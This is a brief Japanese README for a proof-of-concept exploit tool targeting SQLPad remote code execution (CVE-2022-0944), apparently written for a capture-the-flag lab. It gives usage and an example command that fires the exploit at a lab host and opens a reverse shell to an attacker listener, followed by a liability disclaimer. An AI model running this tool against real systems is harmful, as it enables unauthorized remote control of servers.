
SQLPad RCE(CVE-2022-0944)の概念実証エクスプロイトで、攻撃者のマシンへのリバースシェルをトリガーします。認可されたセキュリティテストと教育を目的としています。
SQLPad RCE (CVE-2022-0944) の概念実証エクスプロイトで、攻撃者のPCへのリバースシェルを伴うRCEに至ります。
usage: script.py URL IP PORT
positional arguments:
URL URL to SQLPad
IP Listener host address for reverse shell
PORT Listener port for reverse shell
例:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
このリポジトリに含まれるツールは、教育目的、特にサイバーセキュリティ学習環境での使用のみを目的としています。本コードの作者は、このコードの使用、誤用、または修正に起因するいかなる結果についても一切の責任を負いません。本コードは「現状のまま」提供され、明示または黙示を問わず、商品性または特定目的への適合性の黙示的保証を含むがこれに限定されない、いかなる保証もありません。